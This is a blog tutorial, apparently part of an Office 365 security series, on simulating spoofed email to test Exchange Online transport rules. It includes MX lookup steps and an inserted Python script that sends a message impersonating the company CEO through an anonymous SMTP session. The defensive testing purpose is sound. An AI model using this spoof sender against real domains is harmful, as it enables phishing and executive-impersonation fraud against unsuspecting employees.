When we hear the term “spoof E-mail attack,” the first image that comes to mind is a hacker sitting in a dark room full of flashing lights, rapidly typing cryptic commands.
In reality, performing or simulating an E-mail spoof attack is simple, and any one of us can do it.
In the current article, we will demonstrate three easy and straightforward options for simulating an E-mail spoof attack.
Dealing with spoofed E-mail office 365 | Article Series
- Dealing with an E-mail spoof attack | general introduction | Office 365 based environment | Part 1#12
- Detect Spoof E-mail And Send An Incident Report Using Exchange Online Rule | Part 2#12
- Configuring exceptions for the Exchange Online Spoof E-mail rule | Part 3#12
- Detect Spoof E-mail And Mark The E-mail as spam Using Exchange Online Rule | Part 4#12
- Detect Spoof E-mail And Delete The Spoof E-mail Using Exchange Online Rule | Part 5#12
- Detect Spoof E-mail – Prepend The Subject Of The Spoof E-mail + Add Disclaimer Using Exchange Online Rule | Part 6#12
- Detect Spoof E-mail And Send The Spoof E-mail To Administrative Quarantine Using Exchange Online Rule | Part 7#12
- Detect Spoof E-mail And Raise the SCL value to “9” – Send E-mail To Quarantine Using Exchange Online Rule | Part 8#12
- Analyzing The Results Of The Exchange Spoof E-mail rule | Part 9#12
- How to Simulate E-mail Spoof Attack | Part 10#12
- How to Simulate E-mail Spoof Attack | Part 11#12
- Report Spoof E-mail And Send E-mail For Inspection In Office 365 | Part 12#12
Q1: Don't you think it is dangerous to publish information on how to carry out a spoofed E-mail attack?
A1: No. The “black hat” elements that perform spoof E-mail attacks are usually professionals who don't need my “help and advice” on how to perform them.
Q2: Why should I learn how to simulate a spoof E-mail attack?
A2: Because when we build a “security mail infrastructure” that needs to identify and block various E-mail attacks, such as the spoof E-mail attack, we need a way to test that infrastructure.
In other words, we are the “white hat” side, which needs to know the methods of the “black hat” side.
We need to be able to “mimic” the operations executed by the hostile element that performs the spoof E-mail attack.
We need to know how to carry out a spoof E-mail attack so that we can verify that the mail security measures we implemented, such as the Exchange Online spoofed E-mail rule, are working correctly and doing what they need to do: identify, block and alert about a spoof E-mail attack event.
What tools and methods for performing the spoof E-mail attack will we review in the current article?
In the current article, I will demonstrate three options or methods that we can use for simulating spoof E-mail attacks:
- Option 1 – using a very useful and efficient GUI mail client named Jbmail
- Option 2 – using a telnet client to perform an SMTP session with the destination mail server
- Option 3 – using public online web-based tools
Simulating E-mail Spoof Attack – the Action Plan
Before we start the actual process, in which we examine the Exchange Online spoof transport rule, it is important to know the “action plan” and the order of the tasks that need to be implemented:
Step 1 – Create the required Exchange Online transport rule, which should identify spoof E-mail and execute a particular action in response.
Step 2 – Planning the spoof E-mail attack
Decide on the E-mail addresses that will be used in our spoof E-mail attack:
- The source (sender) E-mail address – the address that the “hostile element” uses to impersonate a legitimate organization recipient.
- The destination E-mail address – the address of the organization user whom we try to “attack.”
Step 3 – Choosing the “attack tool”
We need to decide which tool we will use for simulating the spoof E-mail attack.
Step 4 – Get the hostname of the mail server that represents the domain that we want to test.
Step 5 – Executing the spoof E-mail attack
Step 6 – Verify that the Exchange Online transport rule manages to “identify” the E-mail spoof attack and implements the required actions, such as blocking the E-mail message.
Simulating E-mail Spoof Attack | Our scenario description
Our organization is represented by the domain name: o365pilot.com
Lately, our organization has experienced an E-mail spoof attack, in which the hostile element presents himself as Suzan, our company chief executive officer.
This hostile element sends E-mail messages to our company employees on behalf of Suzan (using the E-mail address Suzan@o365pilot.com).
To prevent this spoofing attack, we have created an Exchange Online transport rule that identifies spoof E-mail attacks.
The central concept of this spoofing attack is that we will address the Exchange Online server that represents the domain name o365pilot.com and present ourselves as Suzan@o365pilot.com, without providing any user credentials (anonymous SMTP session).
The destination recipient whom we will try to “attack” is Bob@o365pilot.com.
Get the host name of the destination mail server
When we choose the option of using the GUI mail client Jbmail or an SMTP telnet session, the preliminary information we need is the hostname of the destination mail server that represents the domain we want to test.
For example, if we want to simulate a spoof E-mail attack to check the security infrastructure of the domain o365pilot.com, we first need to know the hostname of the mail server(s) that represents this domain.
In more technical terms, we need to perform a DNS query for the MX record(s) of the host(s) that handle mail for the domain name.
In our particular scenario, we will spoof the identity of Suzan@o365pilot.com and send the message to the recipient Bob@o365pilot.com.
To address the mail server that represents the domain name o365pilot.com, we need its exact hostname.
We get the name of the mail server by querying a public DNS server for the MX record of the domain name o365pilot.com.
Technically, there are many tools and options for creating the required query.
Get the host name of the destination mail server using NSLOOKUP
In our specific example, we will use the built-in Windows command-line tool NSLOOKUP.
To get the required information, we open the command prompt and run an NSLOOKUP query for the domain o365pilot.com with the query type set to MX.
The following screenshot shows the results.
The hostname of the mail server that represents the domain name o365pilot.com is o365pilot-com.mail.protection.outlook.com.
Get the host name of the destination mail server using MXTOOLBOX
If we prefer a friendlier interface than the NSLOOKUP command line, we can use a variety of web-based tools that will give us the hostname of the mail server that represents a specific domain name.
My favorite web tool is the MXTOOLBOX web site.
The following screenshot shows an example of how we get the required hostname.
In our particular scenario, we are looking for the hostname of the mail server that represents the domain name o365pilot.com.
The answer includes the server hostname and its IP address.
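The following Python script is an added example and is not part of the original article series or of any tool it mentions. It ties together Steps 2 to 5 of the action plan above and the MX lookup of this section: it extracts the MX host from a constructed sample of the Windows NSLOOKUP output (the format printed by the command nslookup -type=mx o365pilot.com, with the hostname from our scenario), builds the spoofed message from Suzan@o365pilot.com to Bob@o365pilot.com, lists the commands that a telnet user would type in the anonymous SMTP session, and, only if you uncomment the last line, opens that session on port 25 without any credentials. The client hostname attacker.example and the subject line are assumptions made for the example.

```python
"""Simulated spoof E-mail: anonymous SMTP session to the domain's MX host."""
import re
import smtplib
from email.message import EmailMessage
from email.utils import formatdate, make_msgid

# Constructed sample (not captured from the real domain) of what the Windows
# command  nslookup -type=mx o365pilot.com  prints; only the hostname is taken
# from the article's scenario.
SAMPLE_NSLOOKUP_OUTPUT = """\
Server:  UnKnown
Address:  8.8.8.8

Non-authoritative answer:
o365pilot.com   MX preference = 0, mail exchanger = o365pilot-com.mail.protection.outlook.com
"""

# Windows nslookup prints one such line per MX record.
MX_LINE = re.compile(r"MX preference = (\d+),\s*mail exchanger = (\S+)")


def parse_nslookup_mx(text):
    """Return the MX hostnames found in Windows nslookup output, lowest preference first."""
    hosts = [(int(pref), host.rstrip(".")) for pref, host in MX_LINE.findall(text)]
    return [host for _, host in sorted(hosts)]


def build_spoof_message(spoofed_from, rcpt_to, subject, body):
    """Build the message the 'hostile element' sends on behalf of the spoofed user.

    The header From carries the spoofed address; send_spoof() below uses the
    same address as the envelope MAIL FROM, so a transport rule that inspects
    either one sees the impersonated sender.
    """
    msg = EmailMessage()
    msg["From"] = spoofed_from
    msg["To"] = rcpt_to
    msg["Subject"] = subject
    msg["Date"] = formatdate(localtime=True)
    msg["Message-ID"] = make_msgid(domain=spoofed_from.split("@", 1)[1])
    msg.set_content(body)
    return msg


def smtp_dialogue(client_helo, mail_from, rcpt_to):
    """Client side of the anonymous session, as it would be typed in telnet.

    No AUTH command appears: the whole point of the simulation is that the
    MX host accepts mail for its own domain from an unauthenticated sender.
    """
    return [
        f"EHLO {client_helo}",
        f"MAIL FROM:<{mail_from}>",
        f"RCPT TO:<{rcpt_to}>",
        "DATA",
        "QUIT",
    ]


def send_spoof(mx_host, mail_from, rcpt_to, msg, client_helo="attacker.example", timeout=30):
    """Deliver msg to mx_host on port 25 with no credentials (anonymous SMTP).

    Returns the dict of refused recipients (empty means the server accepted
    the message); smtplib raises if the server rejects the sender or the data.
    This is the only function here that touches the network.
    """
    with smtplib.SMTP(mx_host, 25, local_hostname=client_helo, timeout=timeout) as smtp:
        smtp.ehlo()
        if smtp.has_extn("starttls"):
            smtp.starttls()  # opportunistic TLS: encryption, not authentication
            smtp.ehlo()
        # Deliberately no smtp.login(): the envelope sender is asserted, never proven.
        return smtp.sendmail(mail_from, [rcpt_to], msg.as_bytes())


if __name__ == "__main__":
    mx = parse_nslookup_mx(SAMPLE_NSLOOKUP_OUTPUT)[0]
    spoofed = "Suzan@o365pilot.com"  # scenario: the impersonated CEO
    target = "Bob@o365pilot.com"     # scenario: the attacked employee
    message = build_spoof_message(spoofed, target, "Urgent request", "Bob, please call me.")
    print("MX host:", mx)
    print("\n".join(smtp_dialogue("attacker.example", spoofed, target)))
    # Uncomment to actually run the simulation against your own tenant:
    # print(send_spoof(mx, spoofed, target, message))
```

Run this only against a domain you administer, and let the “attacked” recipient know in advance. When you read the results in the next step, keep in mind that the envelope sender (MAIL FROM) and the header From are two separate fields; this script sets both to the spoofed address so that the transport rule is tested whichever of the two its condition inspects.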
The next article in the current article series
In the next article, How to Simulate E-mail Spoof Attack | Part 11#12, we will review three different tools that we can use for simulating an E-mail spoof attack, which will help us test the strength of the Exchange Online spoofed E-mail rule.